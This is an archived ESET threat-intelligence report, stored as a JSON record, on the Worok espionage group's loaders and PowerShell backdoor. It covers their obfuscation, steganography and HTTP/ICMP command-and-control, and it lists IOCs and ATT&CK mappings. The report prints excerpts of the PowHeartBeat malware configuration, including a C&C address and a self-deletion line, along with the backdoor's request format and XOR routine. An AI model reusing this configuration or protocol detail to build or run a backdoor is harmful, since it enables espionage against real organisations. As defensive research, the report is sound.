{
	"id": "ba017fe4-09b0-4d3b-b40c-f980a8bec6ce",
	"created_at": "2026-04-06T00:07:30.266519Z",
	"updated_at": "2026-04-10T03:33:18.474073Z",
	"deleted_at": null,
	"sha1_hash": "e634dbb50bdeebb07d4b95670c20db80376fe526",
	"title": "Worok: The big picture",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1805959,
	"plain_text": "Worok: The big picture\r\nBy Thibaut Passilly\r\nArchived: 2026-04-05 16:44:57 UTC\r\nESET researchers recently found targeted attacks that used undocumented tools against various high-profile companies and\r\nlocal governments mostly in Asia. These attacks were conducted by a previously unknown espionage group that we have\r\nnamed Worok and that has been active since at least 2020. Worok’s toolset includes a C++ loader CLRLoad, a PowerShell\r\nbackdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from\r\nPNG files.\r\nWho is Worok?\r\nDuring the ProxyShell (CVE-2021-34523) vulnerability disclosure in early 2021, we observed activity from various APT\r\ngroups. One exhibited characteristics common with TA428:\r\nActivity times\r\nTargeted verticals\r\nUsage of ShadowPad\r\nThe rest of the toolset is very different: for example, TA428 took part in the Able Desktop compromise in 2020. We consider\r\nthat the links are not strong enough to consider Worok to be the same group as TA428, but the two groups might share tools\r\nand have common interests. We decided to create a cluster and named it Worok. The name was chosen after a mutex in a\r\nloader used by the group. Further activity with variants of the same tools was then linked to this group. 
According to ESET’s\r\ntelemetry, Worok has been active since late 2020 and continues to be active as of this writing.\r\nBack in late 2020, Worok was targeting governments and companies in multiple countries, specifically:\r\nA telecommunications company in East Asia\r\nA bank in Central Asia\r\nA maritime industry company in Southeast Asia\r\nA government entity in the Middle East\r\nA private company in southern Africa\r\nThere was a significant break in observed operations from 2021-05 to 2022-01, but Worok activity returned in 2022-02,\r\ntargeting:\r\nAn energy company in Central Asia\r\nA public sector entity in Southeast Asia\r\nFigure 1 presents a visual heatmap of the targeted regions and verticals.\r\nhttps://www.welivesecurity.com/2022/09/06/worok-big-picture/\r\nPage 1 of 16\n\nFigure 1. Map of the targeted regions and verticals\r\nConsidering the targets’ profiles and the tools we’ve seen deployed against these victims, we think Worok’s main objective\r\nis to steal information.\r\nTechnical analysis\r\nWhile the majority of initial accesses are unknown, in some cases through 2021 and 2022 we have seen exploits used\r\nagainst the ProxyShell vulnerabilities. In such cases, typically webshells have been uploaded after exploiting these\r\nvulnerabilities, in order to provide persistence in the victim’s network. Then the operators used various implants to gain\r\nfurther capabilities.\r\nOnce access had been acquired, the operators deployed multiple, publicly available tools for reconnaissance, including\r\nMimikatz, EarthWorm, ReGeorg, and NBTscan, and then deployed their custom implants: a first-stage loader, followed by a\r\nsecond-stage .NET loader (PNGLoad). Unfortunately, we have not been able to retrieve any of the final payloads. 
In 2021,\r\nthe first-stage loader was a CLR assembly (CLRLoad), while in 2022 it has been replaced, in most cases, by a full-featured\r\nPowerShell backdoor (PowHeartBeat) – both execution chains are depicted in Figure 2. These three tools are described in\r\ndetail in the following subsections.\r\nFigure 2. Worok compromise chains\r\nCLRLoad: CLR assembly loader\r\nCLRLoad is a generic Windows PE that we have seen in both 32- and 64-bit versions. It is a loader written in C++ that loads\r\nthe next stage (PNGLoad), which must be a Common Language Runtime (CLR) assembly DLL file. That code is loaded\r\nfrom a file located on disk in a legitimate directory, presumably to mislead victims or incident responders into thinking it is\r\nlegitimate software.\r\nSome CLRLoad samples start by decoding the full path of the file whose content they will load as the next stage. These file\r\npaths are encoded with a single-byte XOR, with a different key in every sample. Decoded or cleartext, these file paths are\r\nabsolute, with the following being those we have encountered:\r\nC:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\xsec_1_5.dll\r\nC:\\Program Files\\UltraViewer\\msvbvm80.dll\r\nC:\\Program Files\\Internet Explorer\\Jsprofile.dll\r\nC:\\Program Files\\WinRar\\RarExtMgt.dll\r\nC:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\lucenelib.dll\r\nNext, a mutex is created and we’ve seen a different name in every sample. The loader checks for this mutex; if found, it\r\nexits, because the loader is already running. In one of the samples, the mutex Wo0r0KGWhYGO was encountered, which\r\ngave the group its name of Worok.\r\nCLRLoad then loads a CLR assembly from the possibly decoded file path. 
As unmanaged code, CLRLoad achieves this via\r\nCorBindToRuntimeEx Windows API calls in 32-bit variants, or CLRCreateInstance calls in 64-bit variants.\r\nPowHeartBeat: PowerShell backdoor\r\nPowHeartBeat is a full-featured backdoor written in PowerShell, obfuscated using various techniques such as compression,\r\nencoding, and encryption. Based on ESET telemetry, we believe PowHeartBeat replaced CLRLoad in more recent Worok\r\ncampaigns as the tool used to launch PNGLoad.\r\nThe first layer of the backdoor code consists of multiple chunks of base64-encoded PowerShell code. Once the payload is\r\nreconstructed, it is executed via IEX. Once decoded, another layer of obfuscated code is executed, which we can see in\r\nFigure 3.\r\nFigure 3. Excerpt of the decoded main function of the second layer of PowHeartBeat\r\nThe second layer of the backdoor first base64-decodes the next layer of its code, which is then decrypted with Triple DES\r\n(CBC mode). After decryption, this code is decompressed using the gzip algorithm, thus giving the third layer of PowerShell\r\ncode, which is the actual backdoor. It is divided into two main parts: configuration, and handling backdoor commands.\r\nThe main layer of backdoor code is also written in PowerShell and uses HTTP or ICMP to communicate with the C\u0026C\r\nserver. It works as depicted in Figure 4.\r\nFigure 4. PowHeartBeat's functioning\r\nConfiguration\r\nThe configuration contains multiple fields, including version number, optional proxy configuration, and C\u0026C address. Table\r\n1 describes the meanings of the configuration fields in the different versions we have observed.\r\nTable 1. 
Configuration field meanings\r\nField name Description\r\nnouse /\r\nikuyrtydyfg\r\n(other samples)\r\nUnused.\r\nClientId\r\nClient identifier, used for the following purposes:\r\nAs a value when constructing the Cookie header for C\u0026C communications.\r\nAs a cryptographic artifact for sent data encryption.\r\nVersion Version number of PowHeartBeat.\r\nExecTimes Number of allowed execution attempts when issuing a RunCmd (command running) command.\r\nUserAgent User agent used for C\u0026C communications.\r\nReferer Referer header used for C\u0026C communications.\r\nAcceptEncoding Unused.\r\nCookieClientId\r\nCookieTaskId\r\nCookieTerminalId\r\nValues used to construct the Cookie header for C\u0026C communications.\r\nUrlHttps Protocol to use for C\u0026C communications.\r\nUrlDomain\r\nIPAddress\r\nDomains\r\nURL, domain(s), or IP address used as the C\u0026C server. If Domains is not empty, it is chosen\r\ninstead of IPAddress. In other cases, IPAddress is taken.\r\nUrlSendHeartBeat URL path used when the backdoor asks the C\u0026C server for commands.\r\nUrlSendResult URL path used when the backdoor sends the results of the command back to the C\u0026C server.\r\nGetUrl\r\nComplete URL, used by PowHeartBeat to request commands from the C\u0026C server. It is the\r\nconcatenation of the URL elements above.\r\nPutUrl Same as GetUrl but used to send the results of the command back to the C\u0026C server.\r\ncurrentPath Unused.\r\nProxyEnableFlag\r\nFlag indicating whether the backdoor must use a proxy or not in order to communicate with the\r\nC\u0026C server.\r\nProxymsg Address of the proxy to use if ProxyEnableFlag is set to $true.\r\nInterval Time in seconds that the script sleeps for between GET requests.\r\nBasicConfigPath\r\nPath to an optional configuration file containing UpTime, DownTime, DefaultInterval, and\r\nDomains. 
Those values will be overridden if the file is present.\r\nUpTime\r\nTime of day from which the backdoor starts operating, meaning it starts making GET requests to\r\nthe C\u0026C server.\r\nDownTime\r\nTime of day until which the backdoor can operate, meaning the time when it stops making\r\nrequests to the C\u0026C server.\r\nDomainIndex\r\nIndex of the current domain name to use for communications with the C\u0026C server. In case a\r\nrequest returns an error message different from 304 (“Not modified”), DomainIndex is increased.\r\nSecretKey\r\nKey used to decrypt/encrypt the configuration. Configuration is encrypted with multiple-byte\r\nXOR.\r\nIfLog Unused.\r\nIfLogFilePath Flag indicating whether logging is enabled.\r\nlogpath Path of the log file.\r\nProxyFile\r\nFile path of the optional proxy configuration. If it is empty or not found in the file system, the\r\nbackdoor retrieves the user’s proxy settings from the registry value\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer.\r\nIfConfig Flag indicating whether to use a configuration file.\r\nFigure 5 shows an example of the configuration extracted from a PowHeartBeat sample (SHA-1:\r\n757ABA12D04FD1167528FDD107A441D11CD8C427).\r\n$Script:nouse = 100;\r\nif(Test-Path $MyInvocation.MyCommand.Path){Remove-item $MyInvocation.MyCommand.Path -Force;}\r\n$Script:ClientId = \"83\";\r\n$Script:Version = \"2.1.3.0003\";\r\n$Script:ExecTimes = 10;\r\n$Script:UserAgent = \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3487.100 Safa\r\n$Script:Referer = \"www.adobe.com\";\r\n$Script:AcceptEncoding = \"text/html,app1ication/xhtml+xml,app1ication/xml;q=0.9,*/*;q=0.8\";\r\n$Script:CookieClientId = \"s_ecid\";\r\n$Script:CookieTaskId = \"aam_uuid\";\r\n$Script:CookieTerminalId = \"AAMC_adobe_0\";\r\n$Script:UrlHttps = 
\"http://\";\r\n$Script:UrlDomain= \" 118.193.78[.]22:443\";\r\n$Script:UrlSendHeartBeat = \"/latest/AdobeMessagingClient.js\";\r\n$Script:UrlSendResult = \"/content/dam/offers-homepage/homepage.jpg\";\r\n$Script:GetUrl = $Script:UrlHttps + $Script:UrlDomain + $Script:UrlSendHeartBeat;\r\n$Script:PutUrl = $Script:UrlHttps + $Script:UrlDomain + $Script:UrlSendResult;\r\n$Script:currentPath = Split-Path -Parent $MyInvocation.MyCommand.Definition;\r\n$Script:ProxyEnableFlag = $false;\r\n$Script:Proxymsg;\r\n$Script:Interval = 10 ;\r\n$Script:BasicConfigPath = \"C:\\ProgramData\\unins.dat\";\r\n$Script:UpTime = 0;\r\n$Script:DownTime = 24;\r\n$Script:Domains;\r\n$Script:DomainIndex;\r\n$Script:SecretKey = \"###ConfigKey###\";\r\n#$Script:IfLog = $true;\r\n$Script:IfLogFilePath = \"C:\\ProgramData\\tpncp.dat\";\r\n$Script:logpath = \"C:\\ProgramData\\unins000.dat\";\r\n$Script:ProxyFile = \"C:\\ProgramData\\hwrenalm.dat\";\r\n$Script:IfConfig = $false;\r\nFigure 5. Configuration example\r\nData encryption\r\nPowHeartBeat encrypts logs and additional configuration file content.\r\nLog file content is encrypted through multiple-byte XOR with a key specified in cleartext in the sample. Interestingly,\r\nclientId is used as a salt for the index into the key array. The key is a 256-byte array, which was identical in every sample\r\nthat we encountered. Additional configuration file content is encrypted through multiple-byte XOR with the value from\r\nSecretKey as its key.\r\nC\u0026C communications\r\nPowHeartBeat used HTTP for C\u0026C communications until version 2.4, and then switched to ICMP. In both cases the\r\ncommunication is not encrypted.\r\nHTTP\r\nIn an infinite loop, the backdoor sends a GET request to the C\u0026C server, asking for a command to issue. 
The encrypted\r\nanswer is decrypted by the backdoor, which processes the command, and writes the command output to a file whose content\r\nis then sent to the C\u0026C server via a POST request.\r\nThe format of the GET requests is the following:\r\nGET \u003cUrlSendHeartBeat\u003e HTTP/1.1\r\nUser-Agent: \u003cUserAgent\u003e\r\nReferer: \u003cReferer\u003e\r\nHost: \u003cDomain\u003e\r\nCookie: \u003cCookieClientId\u003e=\u003cClientId\u003e\r\nConnection: close\r\nNote that the request is constructed using the eponymous configuration fields.\r\nIn the response from the C\u0026C server, the third byte of the content is the command identifier that indicates the command to\r\nbe processed by the backdoor. We’ll call it command_id. The remaining content of the response will be passed as an\r\nargument to the command that is processed. This content is encrypted with the algorithm shown in Figure 6, taskId being the\r\nvalue of the cookie named after CookieTaskId’s value from the configuration.\r\n[int] $pos = $taskId % 256;\r\nfor ($i = 0; $i -lt $tmpBytes.Value.Length; $i++)\r\n{\r\n $pos = $pos + $clientId;\r\n if ($pos -ge 256)\r\n {\r\n $pos = $pos % 256;\r\n }\r\n $tmpBytes.Value[$i] = [byte]($tmpBytes.Value[$i] -bxor $hexEnc[$pos]);\r\n}\r\nFigure 6. Requests content data encryption algorithm\r\nThe response from the C\u0026C server also contains another cookie, whose name is specified by the backdoor’s\r\nCookieTerminalId configuration variable. The value of this cookie is repeated in the POST request from the backdoor, and it\r\nmust not be empty. After executing the backdoor command, PowHeartBeat sends the result as a POST request to the C\u0026C\r\nserver. The result is sent as a file whose name is \u003ccommand_id\u003e.png.\r\nICMP\r\nStarting from version 2.4 of PowHeartBeat, HTTP was replaced by ICMP, sent packets having a timeout of six seconds and\r\nbeing unfragmented. 
Communication through ICMP is most likely a way to evade detection.\r\nThere is no major change in versions 2.4 and later, but we noticed some modifications in the code:\r\nPowHeartBeat sends a heartbeat packet at each loop that contains the string abcdefghijklmnopqrstuvwxyz, before\r\nrequesting a command. This informs the C\u0026C server that the backdoor is ready to receive commands.\r\nRequests to get commands performed by the backdoor contain the string abcdefghijklmnop.\r\nHeartbeat packets have the format described in Figure 7.\r\nFigure 7. Heartbeat packet layout\r\nThe difference between client ID and client flag is that client ID differs in every sample whereas client flag is the same in\r\nevery sample that uses ICMP. heartbeat flag indicates that the backdoor is sending a heartbeat. The response from the C\u0026C\r\nserver has the format described in Figure 8.\r\nFigure 8. C\u0026C server response layout\r\nflag here indicates whether there is a command to issue to the backdoor. Requests to get commands have the format\r\ndescribed in Figure 9.\r\nFigure 9. Layout for requests to get commands\r\nNote that the backdoor’s ICMP mode allows receiving an unlimited amount of data, divided into chunks, and the variables\r\ndata length, current position and total length are used to keep track of the transmitted data. Responses to these requests have\r\nthe format described in Figure 10.\r\nFigure 10. 
Layout of responses to requests for getting commands\r\nAs in HTTP responses, the command identifier is the third byte of data.\r\nAfter seven consecutive ICMP replies with empty or inconsistently formatted content, transfers between the backdoor and\r\nC\u0026C server are considered finished.\r\nConcerning the requests to send the result of the issued command to the C\u0026C server, server mode is changed for post mode,\r\nand the final string (abcdefghijklmnop) is changed for the result data.\r\nBackdoor commands\r\nPowHeartBeat has various capabilities, including command/process execution and file manipulation. Table 2 lists all\r\ncommands supported by the various analyzed samples.\r\nTable 2. PowHeartBeat command descriptions\r\nName\r\nCommand\r\nIdentifier\r\nDescription\r\nCmd 0x02 Execute a PowerShell command.\r\nExe 0x04 Execute a command as a process.\r\nFileUpload 0x06 Upload a file to the victim machine. File content is gzip-compressed.\r\nFileDownLoad 0x08\r\nDownload a file from the victim machine, and return file path, file length, creation\r\ntime, access times, and file content to the C\u0026C server.\r\nFileView 0x0A\r\nGet file information of a specific directory, in particular:\r\nFilenames\r\nFile attributes\r\nLast write times\r\nFile contents\r\nFileDelete 0x0C Delete a file.\r\nFileRename 0x0E Rename or move a file.\r\nChangeDir 0x10 Change the current working location of the backdoor.\r\nInfo 0x12\r\nGet a category of information according to the specified argument:\r\n“Basic information”: ClientId, Version, host name, IP addresses,\r\nexplorer.exe version and size information, OS (architecture and flag\r\nindicating if the machine is a server), Interval, current directory, drive\r\ninformation (name, type, free space and total size), current time\r\n“Time-Interval information”: Interval and current 
time\r\n“Domain information”: decrypted configuration file content\r\nConfig 0x14 Update the configuration file content and reload the configuration.\r\nN/A 0x63 Backdoor exit.\r\nIn case of errors on the backdoor side, the backdoor uses a specific command identifier 0x00 in the POST request to the\r\nC\u0026C server, thus indicating an error occurred.\r\nNote that before sending the information back to the C\u0026C server, the data is gzip-compressed.\r\nPNGLoad: Steganographic loader\r\nPNGLoad is the second-stage payload deployed by Worok on compromised systems and, according to ESET telemetry,\r\nloaded either by CLRLoad or PowHeartBeat. While we don’t see any code in PowHeartBeat that directly loads PNGLoad,\r\nthe backdoor has the capabilities to download and execute additional payloads from the C\u0026C server, which is likely how the\r\nattackers have deployed PNGLoad on systems compromised with PowHeartBeat. PNGLoad is a loader that uses bytes from\r\nPNG files to create a payload to execute. It is a 64-bit .NET executable – obfuscated with .NET Reactor – that masquerades\r\nas legitimate software. For example, Figure 11 shows the CLR headers of a sample masquerading as a WinRAR DLL.\r\nFigure 11. Example of a fake WinRAR DLL\r\nOnce deobfuscated, only one class is present. In this class, there is a MainPath attribute containing the directory path the\r\nbackdoor searches, including its subdirectories, for files with a .png extension, as shown in Figure 12.\r\nFigure 12. .png file listing\r\nEach .png file located by this search of MainPath is then checked for steganographically embedded content. 
First, the least-significant bits of each pixel’s R (red), G (green), B (blue), and A (alpha) values are fetched and assembled into a buffer.\r\nShould the first eight bytes of that buffer match the magic number seen in Figure 13 and the next eight-byte value, control,\r\nbe non-null, the file passes PNGLoad’s steganographic content check. For such files, processing continues with the\r\nremainder of the buffer decrypted with a multiple-byte XOR, using the key stored in PNGLoad’s SecretKeyBytes attribute,\r\nand then the decrypted buffer is gzip-decompressed. The result is expected to be a PowerShell script, which is run\r\nimmediately.\r\nFigure 13. Format of buffer PNGLoad creates from processing .png files\r\nInterestingly, operations performed by PNGLoad are logged in a file whose path is stored in the variable LogFilePath.\r\nOperations are only logged if a file is present whose path is specified by the internal variable IfLogFilePath.\r\nWe have not been able to obtain a sample .png file used along with PNGLoad, but the way PNGLoad operates suggests that\r\nit should work with valid PNG files. To hide the malicious payload, Worok uses Bitmap objects in C#, which only take pixel\r\ninformation from files, not the file metadata. This means that Worok can hide its malicious payloads in valid, innocuous-looking PNG images and thus hide in plain sight.\r\nConclusion\r\nWorok is a cyberespionage group that develops its own tools, as well as leveraging existing tools, to compromise its targets.\r\nStealing information from their victims is what we believe the operators are after because they focus on high-profile entities\r\nin Asia and Africa, targeting various sectors, both private and public, but with a specific emphasis on government entities.\r\nActivity times and toolset indicate possible ties with TA428, but we make this assessment with low confidence. 
Their\r\ncustom toolset includes two loaders – one in C++ and one in C# .NET – and one PowerShell backdoor. While our visibility\r\nis limited, we hope that shedding light on this group will encourage other researchers to share information about this group.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the\r\nESET Threat Intelligence page.\r\nIOCs\r\nFiles\r\nSHA-1 Filename ESET Detection name Comment\r\n3A47185D0735CDECF4C7C2299EB18401BFB328D5 script PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.4.3.0003.\r\n27ABB54A858AD1C1FF2863913BDA698D184E180D script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n2.4.3.0003.\r\n678A131A9E932B9436241402D9727AA7D06A87E3 script PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.4.3.0003.\r\n757ABA12D04FD1167528FDD107A441D11CD8C427 script PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.1.3.0003.\r\n54700A48D934676FC698675B4CA5F712C0373188 script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n1.1.3.0002.\r\nC2F53C138CB1B87D8FC9253A7088DB30B25389AF script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n1.1.3.0002.\r\nC2F1954DE11F72A46A4E823DE767210A3743B205 tmp.ps1 PowerShell/PowHeartBeat.B\r\nPowHeartBeat\r\n2.4.3.0004.\r\nCE430A27DF87A6952D732B4562A7C23BEF4602D1 tmp.ps1 PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n2.1.3.0004.\r\nEDE5AB2B94BA85F28D5EE22656958E4ECD77B6FF script PowerShell/PowHeartBeat.A\r\nPowHeartBeat\r\n2.4.3.0003.\r\n4721EEBA13535D1EE98654EFCE6B43B778F13126 vix64.dll MSIL/PNGLoader.A PNGLoader.\r\n728A6CB7A150141B4250659CF853F39BFDB7A46C RarExtMgt.dll MSIL/PNGLoader.A PNGLoader.\r\n864E55749D28036704B6EA66555A86527E02AF4A Jsprofile.dll MSIL/PNGLoader.A PNGLoader.\r\n8DA6387F30C584B5FD3694A99EC066784209CA4C vssxml.dll MSIL/PNGLoader.A 
PNGLoader.\r\nAA60FB4293530FBFF00D200C0D44EEB1A17B1C76 xsec_1_5.dll MSIL/PNGLoader.A PNGLoader.\r\nB2EAEC695DD8BB518C7E24C4F37A08344D6975BE msvbvm80.dll MSIL/PNGLoader.A PNGLoader.\r\nCDB6B1CAFEE098615508F107814179DEAED1EBCF lucenelib.dll MSIL/PNGLoader.A PNGLoader.\r\n4F9A43E6CF37FF20AE96E564C93898FDA6787F7D vsstrace.dll Win64/CLRLoad.C CLRLoad.\r\nF181E87B0CD6AA4575FD51B9F868CA7B27240610 ncrypt.dll Win32/CLRLoad.A CLRLoad.\r\n4CCF0386BDE80C339EFE0CC734CB497E0B08049C ncrypt.dll Win32/CLRLoad.A CLRLoad.\r\n5CFC0D776AF023DCFE8EDED5CADA03C6D7F9C244 wlbsctrl.dll Win64/CLRLoad.E CLRLoad.\r\n05F19EBF6D46576144276090CC113C6AB8CCEC08 wlbsctrl.dll Win32/CLRLoad.A CLRLoad.\r\nA5D548543D3C3037DA67DC0DA47214B2C2B15864 secur32.dll Win64/CLRLoad.H CLRLoad.\r\nCBF42DCAF579AF7E6055237E524C0F30507090F3 dbghelp.dll Win64/CLRLoad.C CLRLoad.\r\nFile Paths\r\nSome of the MainPath, LogFilePath and IfLogFilePath values that we encountered in PNGLoad samples:\r\nMainPath LogFilePath IfLogFilePath\r\nC:\\Program Files\\VMware\\VMware Tools\\ C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\readme.txt C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VMWSU_V1_1.dll\r\nC:\\Program Files\\WinRar\\ C:\\Program Files\\WinRar\\rarinstall.log C:\\Program Files\\WinRar\\des.dat\r\nC:\\Program Files\\UltraViewer\\ C:\\Program Files\\UltraViewer\\CopyRights.dat C:\\Program Files\\UltraViewer\\uvcr.dll\r\nNetwork\r\nDomain IP\r\nNone 118.193.78[.]22\r\nNone 118.193.78[.]57\r\nairplane.travel-commercials[.]agency 5.183.101[.]9\r\ncentral.suhypercloud[.]org 45.77.36[.]243\r\nMutexes\r\nIn CLRLoad samples, the mutex names that we encountered 
are:\r\naB82UduGX0EX\r\nad8TbUIZl5Ga\r\nMr2PJVxbIBD4\r\noERiQtKLgPgK\r\nU37uxsCsA4Xm\r\nWo0r0KGWhYGO\r\nxBUjQR2vxYTz\r\nzYCLBWekRX3t\r\n3c3401ad-e77d-4142-8db5-8eb5483d7e41\r\n9xvzMsaWqxMy\r\nA comprehensive list of Indicators of Compromise (IoCs) and samples can be found in our GitHub repository.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 11 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nReconnaissance\r\nT1592.002\r\nGather Victim Host\r\nInformation: Software\r\nPowHeartBeat gathers explorer.exe's\r\ninformation.\r\nT1592.001\r\nGather Victim Host\r\nInformation: Hardware\r\nPowHeartBeat gathers information about drives.\r\nT1590.005\r\nGather Victim Network\r\nInformation: IP Addresses\r\nPowHeartBeat gathers IP addresses of the\r\ncompromised computer.\r\nResource\r\nDevelopment\r\nT1583.004 Acquire Infrastructure: Server Worok uses its own C\u0026C servers.\r\nT1588.002 Obtain Capabilities: Tool\r\nWorok deployed multiple publicly available\r\ntools on the compromised machines.\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nWorok has registered domains to facilitate C\u0026C\r\ncommunication and staging.\r\nT1588.005 Obtain Capabilities: Exploits Worok has used the ProxyShell vulnerability.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nWorok has developed its own malware:\r\nCLRLoad, PNGLoad, PowHeartBeat.\r\nT1587.003\r\nDevelop Capabilities: Digital\r\nCertificates\r\nWorok has created Let’s Encrypt SSL\r\ncertificates in order to enable mutual TLS\r\nauthentication for malware.\r\nExecution T1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nPowHeartBeat is written in PowerShell.\r\nPersistence T1505.003\r\nServer Software Component:\r\nWeb Shell\r\nWorok uses the webshell ReGeorg.\r\nDefense Evasion\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nWorok uses various custom XOR-based 
schemes\r\nto encrypt strings and logs in PowHeartBeat,\r\nPNGLoad, and CLRLoad.\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or Location\r\nPNGLoad samples are deployed in legitimate-looking VMWare directories.\r\nCredential Access T1003.001\r\nOS Credential Dumping:\r\nLSASS Memory\r\nWorok uses Mimikatz to dump credentials from\r\nLSASS memory.\r\nDiscovery\r\nT1082\r\nSystem Information\r\nDiscovery\r\nPowHeartBeat gathers OS information.\r\nT1083 File and Directory Discovery PowHeartBeat can list files and directories.\r\nT1046 Network Service Discovery\r\nWorok uses NbtScan to obtain network\r\ninformation on compromised machines.\r\nT1124 System Time Discovery\r\nPowHeartBeat gathers the victim’s time\r\ninformation.\r\nCollection\r\nT1005 Data from Local System\r\nPowHeartBeat gathers data from the local\r\nsystem.\r\nT1560.002\r\nArchive Collected Data:\r\nArchive via Library\r\nPowHeartBeat gzip-compresses data before\r\nsending it to the C\u0026C server.\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nSome PowHeartBeat variants use HTTP as the\r\ncommunication protocol with the C\u0026C server.\r\nT1090.001 Proxy: Internal Proxy\r\nPowHeartBeat handles proxy configuration on\r\nthe victim’s machine.\r\nT1001.002\r\nData Obfuscation:\r\nSteganography\r\nPNGLoad extracts pixel values from .png files\r\nto reconstruct payloads.\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nPowHeartBeat handles HTTPS communications\r\nwith the C\u0026C server.\r\nT1095\r\nNon-Application Layer\r\nProtocol\r\nSome PowHeartBeat variants use ICMP as the\r\ncommunication protocol with the C\u0026C server.\r\nT1132.001\r\nData Encoding: Standard\r\nEncoding\r\nWorok uses XOR encoding in PowHeartBeat,\r\nand PNGLoad.\r\nT1132.002\r\nData Encoding: Non-Standard\r\nEncoding\r\nWorok uses XOR encoding 
algorithms that\r\nmake use of an additional salt.\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nPowHeartBeat uses its C\u0026C communication\r\nchannel to exfiltrate information.\r\nSource: https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
	],
	"report_names": [
		"worok-big-picture"
	],
	"threat_actors": [
		{
			"id": "a7e5d6c0-5f7e-4d1c-87fa-bbf65b4e65b9",
			"created_at": "2022-10-25T16:07:24.42571Z",
			"updated_at": "2026-04-10T02:00:04.984213Z",
			"deleted_at": null,
			"main_name": "Worok",
			"aliases": [],
			"source_name": "ETDA:Worok",
			"tools": [
				"CLRLoad",
				"Mimikatz",
				"NBTscan",
				"PNGLoad",
				"PowHeartBeat",
				"SAMRID",
				"nbtscan",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e294737b-6aa7-480e-841d-cbed102c356c",
			"created_at": "2023-07-20T02:00:08.787855Z",
			"updated_at": "2026-04-10T02:00:03.368575Z",
			"deleted_at": null,
			"main_name": "Worok",
			"aliases": [],
			"source_name": "MISPGALAXY:Worok",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2f07a03f-eb1f-47c8-a8e9-a1a00f2ec253",
			"created_at": "2022-10-25T16:07:24.277669Z",
			"updated_at": "2026-04-10T02:00:04.919609Z",
			"deleted_at": null,
			"main_name": "TA428",
			"aliases": [
				"Operation LagTime IT",
				"Operation StealthyTrident",
				"ThunderCats"
			],
			"source_name": "ETDA:TA428",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agent.dhwf",
				"Albaniiutas",
				"BlueTraveller",
				"Chymine",
				"Cotx RAT",
				"CoughingDown",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Gen:Trojan.Heur.PT",
				"Kaba",
				"Korplug",
				"LuckyBack",
				"PhantomNet",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"RoyalRoad",
				"SManager",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TManger",
				"TVT",
				"Thoper",
				"Xamtrav",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "20b5fa2f-2ef1-4e69-8275-25927a762f72",
			"created_at": "2025-08-07T02:03:24.573647Z",
			"updated_at": "2026-04-10T02:00:03.765721Z",
			"deleted_at": null,
			"main_name": "BRONZE DUDLEY",
			"aliases": [
				"TA428 ",
				"Temp.Hex ",
				"Vicious Panda "
			],
			"source_name": "Secureworks:BRONZE DUDLEY",
			"tools": [
				"NCCTrojan",
				"PhantomNet",
				"PoisonIvy",
				"Royal Road"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a4aca3ca-9e04-42d1-b037-f7fb3fbab0b1",
			"created_at": "2023-01-06T13:46:39.042499Z",
			"updated_at": "2026-04-10T02:00:03.194713Z",
			"deleted_at": null,
			"main_name": "TA428",
			"aliases": [
				"BRONZE DUDLEY",
				"Colourful Panda"
			],
			"source_name": "MISPGALAXY:TA428",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434050,
	"ts_updated_at": 1775791998,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e634dbb50bdeebb07d4b95670c20db80376fe526.pdf",
		"text": "https://archive.orkl.eu/e634dbb50bdeebb07d4b95670c20db80376fe526.txt",
		"img": "https://archive.orkl.eu/e634dbb50bdeebb07d4b95670c20db80376fe526.jpg"
	}
}